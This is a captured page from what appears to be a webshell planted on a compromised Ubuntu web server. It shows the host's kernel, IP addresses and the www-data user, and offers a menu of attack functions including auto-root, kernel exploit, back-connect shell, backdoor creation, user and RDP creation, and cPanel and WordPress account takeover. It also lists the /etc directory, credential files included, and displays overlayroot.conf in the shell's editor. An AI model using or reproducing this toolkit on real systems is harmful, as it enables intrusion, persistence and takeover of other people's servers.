Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.139.94.174
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
ImageMagick-6
[ DIR ]
drwxr-xr-x
NetworkManager
[ DIR ]
drwxr-xr-x
X11
[ DIR ]
drwxr-xr-x
acpi
[ DIR ]
drwxr-xr-x
alternatives
[ DIR ]
drwxr-xr-x
apache2
[ DIR ]
drwxr-xr-x
apm
[ DIR ]
drwxr-xr-x
apparmor
[ DIR ]
drwxr-xr-x
apparmor.d
[ DIR ]
drwxr-xr-x
apport
[ DIR ]
drwxr-xr-x
apt
[ DIR ]
drwxr-xr-x
bash_completion.d
[ DIR ]
drwxr-xr-x
binfmt.d
[ DIR ]
drwxr-xr-x
byobu
[ DIR ]
drwxr-xr-x
ca-certificates
[ DIR ]
drwxr-xr-x
calendar
[ DIR ]
drwxr-xr-x
cloud
[ DIR ]
drwxr-xr-x
console-setup
[ DIR ]
drwxr-xr-x
cron.d
[ DIR ]
drwxr-xr-x
cron.daily
[ DIR ]
drwxr-xr-x
cron.hourly
[ DIR ]
drwxr-xr-x
cron.monthly
[ DIR ]
drwxr-xr-x
cron.weekly
[ DIR ]
drwxr-xr-x
cryptsetup-initramfs
[ DIR ]
drwxr-xr-x
dbconfig-common
[ DIR ]
drwxr-xr-x
dbus-1
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
depmod.d
[ DIR ]
drwxr-xr-x
dhcp
[ DIR ]
drwxr-xr-x
dnsmasq.d
[ DIR ]
drwxr-xr-x
dnsmasq.d-available
[ DIR ]
drwxr-xr-x
dpkg
[ DIR ]
drwxr-xr-x
emacs
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
ghostscript
[ DIR ]
drwxr-xr-x
groff
[ DIR ]
drwxr-xr-x
grub.d
[ DIR ]
drwxr-xr-x
gss
[ DIR ]
drwxr-xr-x
init
[ DIR ]
drwxr-xr-x
init.d
[ DIR ]
drwxr-xr-x
initramfs-tools
[ DIR ]
drwxr-xr-x
iproute2
[ DIR ]
drwxr-xr-x
iscsi
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
landscape
[ DIR ]
drwxrwxr-x
ld.so.conf.d
[ DIR ]
drwxr-xr-x
ldap
[ DIR ]
drwxr-xr-x
letsencrypt
[ DIR ]
drwxr-xr-x
lighttpd
[ DIR ]
drwxr-xr-x
logcheck
[ DIR ]
drwxr-xr-x
logrotate.d
[ DIR ]
drwxr-xr-x
lvm
[ DIR ]
drwxr-xr-x
mdadm
[ DIR ]
drwxr-xr-x
modprobe.d
[ DIR ]
drwxr-xr-x
modules-load.d
[ DIR ]
drwxr-xr-x
mysql
[ DIR ]
drwxr-xr-x
netplan
[ DIR ]
drwxr-xr-x
network
[ DIR ]
drwxr-xr-x
networkd-dispatcher
[ DIR ]
drwxr-xr-x
newt
[ DIR ]
drwxr-xr-x
opt
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
perl
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
phpmyadmin
[ DIR ]
drwxr-xr-x
pm
[ DIR ]
drwxr-xr-x
polkit-1
[ DIR ]
drwxr-xr-x
pollinate
[ DIR ]
drwxr-xr-x
profile.d
[ DIR ]
drwxr-xr-x
python
[ DIR ]
drwxr-xr-x
python2.7
[ DIR ]
drwxr-xr-x
python3
[ DIR ]
drwxr-xr-x
python3.6
[ DIR ]
drwxr-xr-x
rc0.d
[ DIR ]
drwxr-xr-x
rc1.d
[ DIR ]
drwxr-xr-x
rc2.d
[ DIR ]
drwxr-xr-x
rc3.d
[ DIR ]
drwxr-xr-x
rc4.d
[ DIR ]
drwxr-xr-x
rc5.d
[ DIR ]
drwxr-xr-x
rc6.d
[ DIR ]
drwxr-xr-x
rcS.d
[ DIR ]
drwxr-xr-x
rsyslog.d
[ DIR ]
drwxr-xr-x
security
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
skel
[ DIR ]
drwxr-xr-x
sos
[ DIR ]
drwxr-xr-x
ssh
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
sudoers.d
[ DIR ]
drwxr-x---
sysctl.d
[ DIR ]
drwxr-xr-x
systemd
[ DIR ]
drwxr-xr-x
terminfo
[ DIR ]
drwxr-xr-x
tmpfiles.d
[ DIR ]
drwxr-xr-x
ubuntu-advantage
[ DIR ]
drwxr-xr-x
udev
[ DIR ]
drwxr-xr-x
ufw
[ DIR ]
drwxr-xr-x
update-manager
[ DIR ]
drwxr-xr-x
update-motd.d
[ DIR ]
drwxr-xr-x
update-notifier
[ DIR ]
drwxr-xr-x
vim
[ DIR ]
drwxr-xr-x
vmware-tools
[ DIR ]
drwxr-xr-x
xdg
[ DIR ]
drwxr-xr-x
.pwd.lock
0
B
-rw-------
adduser.conf
2.96
KB
-rw-r--r--
at.deny
144
B
-rw-r-----
bash.bashrc
2.26
KB
-rw-r--r--
bash_completion
45
B
-rw-r--r--
bindresvport.blacklist
367
B
-rw-r--r--
ca-certificates.conf
7.63
KB
-rw-r--r--
ca-certificates.conf.dpkg-old
6.93
KB
-rw-r--r--
crontab
722
B
-rw-r--r--
crypttab
54
B
-rw-r--r--
debconf.conf
2.9
KB
-rw-r--r--
debian_version
11
B
-rw-r--r--
deluser.conf
604
B
-rw-r--r--
ec2_version
35
B
-rw-r--r--
environment
106
B
-rw-r--r--
ethertypes
1.29
KB
-rw-r--r--
fstab
84
B
-rw-r--r--
fuse.conf
280
B
-rw-r--r--
gai.conf
2.52
KB
-rw-r--r--
group
704
B
-rw-r--r--
group-
691
B
-rw-r--r--
gshadow
584
B
-rw-r-----
gshadow-
574
B
-rw-r-----
hdparm.conf
4.75
KB
-rw-r--r--
host.conf
92
B
-rw-r--r--
hostname
10
B
-rw-r--r--
hosts
621
B
-rw-r--r--
hosts.allow
411
B
-rw-r--r--
hosts.deny
711
B
-rw-r--r--
inputrc
1.71
KB
-rw-r--r--
issue
26
B
-rw-r--r--
issue.net
19
B
-rw-r--r--
kernel-img.conf
110
B
-rw-r--r--
ld.so.cache
24.53
KB
-rw-r--r--
ld.so.conf
34
B
-rw-r--r--
legal
267
B
-rw-r--r--
libaudit.conf
191
B
-rw-r--r--
locale.alias
2.92
KB
-rw-r--r--
locale.gen
9.17
KB
-rw-r--r--
localtime
127
B
-rw-r--r--
login.defs
10.3
KB
-rw-r--r--
logrotate.conf
703
B
-rw-r--r--
lsb-release
105
B
-rw-r--r--
ltrace.conf
14.52
KB
-rw-r--r--
machine-id
33
B
-r--r--r--
magic
111
B
-rw-r--r--
magic.mime
111
B
-rw-r--r--
mailcap
3.6
KB
-rw-r--r--
mailcap.order
449
B
-rw-r--r--
manpath.config
5.05
KB
-rw-r--r--
mime.types
23.73
KB
-rw-r--r--
mke2fs.conf
812
B
-rw-r--r--
modules
195
B
-rw-r--r--
mtab
0
B
-r--r--r--
nanorc
8.84
KB
-rw-r--r--
networks
91
B
-rw-r--r--
nsswitch.conf
513
B
-rw-r--r--
os-release
386
B
-rw-r--r--
overlayroot.conf
6.76
KB
-rw-r--r--
overlayroot.local.conf
112
B
-rw-r--r--
pam.conf
552
B
-rw-r--r--
papersize
3
B
-rw-r--r--
passwd
1.53
KB
-rw-r--r--
passwd-
1.52
KB
-rw-r--r--
popularity-contest.conf
0
B
-rw-r--r--
profile
581
B
-rw-r--r--
protocols
2.86
KB
-rw-r--r--
resolv.conf
715
B
-rw-r--r--
rmt
268
B
-rwxr-xr-x
rpc
887
B
-rw-r--r--
rsyslog.conf
1.33
KB
-rw-r--r--
screenrc
3.58
KB
-rw-r--r--
securetty
4.04
KB
-rw-r--r--
services
18.73
KB
-rw-r--r--
shadow
937
B
-rw-r-----
shadow-
937
B
-rw-r-----
shells
103
B
-rw-r--r--
subgid
35
B
-rw-r--r--
subuid
35
B
-rw-r--r--
sudoers
755
B
-r--r-----
sysctl.conf
2.62
KB
-rw-r--r--
timezone
8
B
-rw-r--r--
ucf.conf
1.23
KB
-rw-r--r--
updatedb.conf
403
B
-rw-r--r--
vtrgb
158
B
-rw-r--r--
wgetrc
4.83
KB
-rw-r--r--
zsh_command_not_found
477
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : overlayroot.conf
# This is the overlayroot config file # By default, overlayroot is not enabled. # To enable overlayroot: # 1) edit the 'overlayroot' definition below # 2) reboot # # Supported values: # * overlayroot=tmpfs or overlayroot=tmpfs:PARAMETERS # write all changes to a temporary (ram only) backing device # A tmpfs mount will be created, and usable filesystem can # grow to 1/2 available memory. # # available parameters: # * see COMMON PARAMETERS # # examples: # overlayroot=tmpfs # overlayroot=tmpfs:swap=1 # # * overlayroot=DEVICE or overlayroot=device:PARAMETERS # mount DEVICE as overlayfs and write changes there # device must already have kernel mountalbe filesystem on it. # # available parameters are: # * dev: default: "" [REQUIRED] # use given device for backing filesystem. # Note, 'overlayroot=/dev/vdb' is translated to # 'overlayrooot=device:dev=/dev/vdb' # * timeout: default: 0 # if 'dev' provided does not exist, wait up to many seconds for # it to appear. # * see COMMON PARAMETERS # # examples: # overlayroot=/dev/xvdb # overlayroot=/dev/vdb # overlayroot=device:dev=/dev/sdb,timeout=180 # overlayroot=device:dev=LABEL=my-flashdrive,timeout=180 # # * overlayroot=crypt:PARAMETERS # use an encrypted [dmcrypt] device as the backing device. Parameters # are comma delimited key=value pairs. # # available parameters are: # * dev: default: "" [REQUIRED] # use given device for backing filesystem. # * mapname: default: "secure" # the name of the map device to be created in /dev/mapper # * pass: default: "" # if not provided or empty, password is randomly generated # the generated password will be stored for recovery in # /run/initramfs/overlayroot.passwd # * fstype: default: "ext4" # mapname=mapper,pass=foo,fstype=ext4,mkfs=1 # * mkfs: default: 1 # 0: never create filesystem # 1: if pass is given and mount fails, create a new one # if no pass given, create new # 2: if pass is given and mount fails, fail # if no pass given, create new # * timeout: default: 0 # if 'dev' provided does not exist, wait up to many seconds for # it to appear. # * see COMMON PARAMETERS # # examples: # crypt:mapname=mapper,pass=foo,fstype=ext4,mkfs=1,dev=vdb # crypt:mapname=mapper,pass=foo,fstype=ext3,mkfs=1,dev=/dev/disk/by-label/my-jumpdrive,timeout=120 # crypt:dev=xvdb # # * overlayroot=disabled # if set explicitly to 'disabled', or an empty string, then # overlayroot will do nothing. # # # COMMON PARAMETERS: # The following parameters are supported for each of overlayroot= # values above. # * swap: default: 0 # allowed values: 0, 1 # indicate if swap partitions should be allowed. By default swap entries # are removed from /etc/fstab to disable swap. # Swap *files* are always disabled, independent of this setting. # # * recurse: default: 1 # allowed values: 0, 1 # indicate if all mounts should be made read-only, or just /. # if set to 1, then all filesystems will be mounted read-only. # if set to 0, only root will be set to read-only, and changes # to other filesystems will be permenant. For example, if # /home is on a separate partition from / and recurse set to 0 # then changes to /home will go through to the original device. # # * debug: default: 0 # allowed values: 0, 1 # enable debug output if set to 1 # # * dir: default: "/overlay" # the directory under the filesystem to use for writes # default is to use top level directory. For example, use # 'dir=my-tests/run1' and later 'dir=my-tests/run2' # # * driver: default: "auto" # This can be 'overlay' or 'overlayfs'. It will affect which filesystem # is used to provide the overlay and the entries in fstab. # The default value is almost certainly correct. # # overlayroot_cfgdisk: # * default: 'disabled' # If this variable is set, it references a disk/filesystem that # may exist, and include a 'overlayroot.conf' file in it's root directory # If a such a device exists, then it's overlayroot.conf file can # set overlayroot as above. # # examples: # * overlayroot_cfgdisk="LABEL=OROOTCFG" # * overlayroot_cfgdisk="/dev/vdb" # # Note: if you enable this setting, then you must be careful to be sure # that no filesystems are created that match this without your # knowledge. This is because code on that filesystem is executed # as root in the initramfs environment. # # Notes: # * This file is managed by dpkg as a conffile, so changes to it # will force dpkg config file prompts on package updates that contain a # change. Instead of putting changes here, put them in # /etc/overlayroot.local.conf # * you can pass the same 'overlayroot=' parameters on the kernel # command line, and they will override any values set here. # This includes 'overlayroot=' or 'overlayroot=disabled' to disable # a value set in this file. # * if you specify crypt:dev=/dev/vdb, then DATA WILL BE LOST # on /dev/vdb. A safer value would be to use # crypt:dev=/dev/vdb,pass=somepassword,mkfs=0 # However, you would then have to have previously set up the luks device. # Do that like the following: # $ MAPNAME="secure"; DEV="/dev/vdg"; PASSWORD="foobar" # $ sudo wipefs -a $DEV # $ printf "%s" "$PASSWORD" | # sudo cryptsetup luksFormat "${$DEV}" --key-file - # $ printf "%s" "$PASSWORD" | # sudo cryptsetup luksOpen "${DEV}" "${MAPNAME}" --key-file - # $ sudo mke2fs -t "ext4" "/dev/mapper/${MAPNAME}" # # Security Note: # IT IS INSECURE TO SET THIS PASSWORD HERE IN THIS CLEARTEXT CONFIGURATION # FILE OR ON THE KERNEL COMMAND LINE. # Randomly generated passwords are more secure, but you won't be able to # read your encrypted disk on reboot. # Randomly generated passwords are generated by calculating the sha512sum # of a concatenation of: # - stat -L /dev/* /proc/* /sys/* # + some unpredictability of access/modify times of a number of kernel # files, directories, and block devices # - /proc/sys/kernel/random/boot_id # + 16-bytes uuid, consider this a 'salt' # - /proc/sys/kernel/random/uuid # + 16-bytes uuid, consider this psuedo randomness # - /dev/urandom # + 4096-bytes of psuedo randomness # - $DEV # + 4096-bytes from the head of the disk # + security-paranoid users can write 4096-bytes of randomness to # this device and specify mkfs=1 before rebooting into an # crypt+overlayroot setup # The result is stored in r-------- /dev/.initramfs/overlayroot.XXXXXXX, # which is a tmpfs in memory. overlayroot_cfgdisk="disabled" overlayroot=""
Close